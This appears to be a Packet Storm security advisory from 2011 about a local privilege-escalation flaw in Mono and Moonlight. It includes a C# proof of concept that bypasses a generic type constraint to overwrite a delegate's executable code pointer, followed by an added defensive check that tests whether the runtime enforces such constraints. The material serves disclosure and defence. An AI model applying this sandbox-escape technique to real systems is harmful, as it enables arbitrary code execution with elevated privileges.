Source: packetstorm. Author: Chris Howie. ID: PACKETSTORM:97427
Date: Jan 11, 2011 - 12:00 a.m.

Mono/Moonlight Local Privilege Escalation

packetstormsecurity.com

EPSS: 0.347 (Low), percentile 96.7%

Mono and Moonlight are prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.

PoC:

```csharp
using System;
using System.Reflection;
using System.Runtime.InteropServices;

public class DelegateWrapper {
    public IntPtr method_ptr;
}

public delegate void MethodWrapper ();

public class BreakSandbox {
    // T is constrained to DelegateWrapper.
    private static DelegateWrapper Convert <T> (T dingus) where T : DelegateWrapper {
        return dingus;
    }

    private static DelegateWrapper ConvertDelegate (Delegate del) {
        var m = typeof (BreakSandbox).GetMethod ("Convert",
            BindingFlags.NonPublic | BindingFlags.Static);
        // Delegate does not derive from DelegateWrapper, so this
        // instantiation violates the constraint on T.
        var gm = m.MakeGenericMethod (typeof (Delegate));

        var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
            (typeof (Func <Delegate, DelegateWrapper>), null, gm);

        return d (del);
    }

    public static void Main (string [] args) {
        MethodWrapper d = delegate {
            Console.WriteLine ("Hello");
        };

        d ();
        var converted = ConvertDelegate (d);
        // Overwrite the already WX page with a 'ret'
        Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
        d ();
    }
}
```
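The PoC passes `typeof (Delegate)` to `MakeGenericMethod` for a method whose `T` is constrained to `DelegateWrapper`. The following C# check is an added example, not part of the original advisory: `Satisfies` validates a type argument against a generic parameter's constraints, and `RuntimeRejects` reports whether the running runtime refuses the invalid instantiation with the `ArgumentException` that .NET documents for `MakeGenericMethod`. The names `ConstraintCheck`, `Satisfies` and `RuntimeRejects` are assumptions made for this example.

```csharp
using System;
using System.Reflection;

public class DelegateWrapper { public IntPtr method_ptr; }

public static class ConstraintCheck {
    // Same shape as the PoC's Convert<T>: T must derive from DelegateWrapper.
    private static DelegateWrapper Convert<T> (T value) where T : DelegateWrapper {
        return value;
    }

    // Manual check of one type argument against one generic parameter.
    // Limitation: constraints that mention other type parameters
    // (e.g. IComparable<T>) are not resolved and are reported as unsatisfied.
    public static bool Satisfies (Type param, Type arg) {
        var special = param.GenericParameterAttributes
                      & GenericParameterAttributes.SpecialConstraintMask;
        if ((special & GenericParameterAttributes.ReferenceTypeConstraint) != 0
            && arg.IsValueType)
            return false;
        if ((special & GenericParameterAttributes.NotNullableValueTypeConstraint) != 0
            && (!arg.IsValueType || Nullable.GetUnderlyingType (arg) != null))
            return false;
        if ((special & GenericParameterAttributes.DefaultConstructorConstraint) != 0
            && !arg.IsValueType
            && (arg.IsAbstract || arg.GetConstructor (Type.EmptyTypes) == null))
            return false;
        foreach (var constraint in param.GetGenericParameterConstraints ())
            if (!constraint.IsAssignableFrom (arg))
                return false;
        return true;
    }

    // True if the runtime itself refuses the invalid instantiation.
    public static bool RuntimeRejects (MethodInfo open, Type arg) {
        try { open.MakeGenericMethod (arg); return false; }
        catch (ArgumentException) { return true; }
    }

    public static void Main () {
        var open = typeof (ConstraintCheck).GetMethod ("Convert",
            BindingFlags.NonPublic | BindingFlags.Static);
        var t = open.GetGenericArguments ()[0];
        Console.WriteLine ("manual, Delegate: " + Satisfies (t, typeof (Delegate)));
        Console.WriteLine ("manual, DelegateWrapper: " + Satisfies (t, typeof (DelegateWrapper)));
        Console.WriteLine ("runtime rejects Delegate: " + RuntimeRejects (open, typeof (Delegate)));
    }
}
```

If the manual check returns false for `Delegate` while `RuntimeRejects` also returns false, the runtime is not enforcing the constraint that the PoC relies on bypassing.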
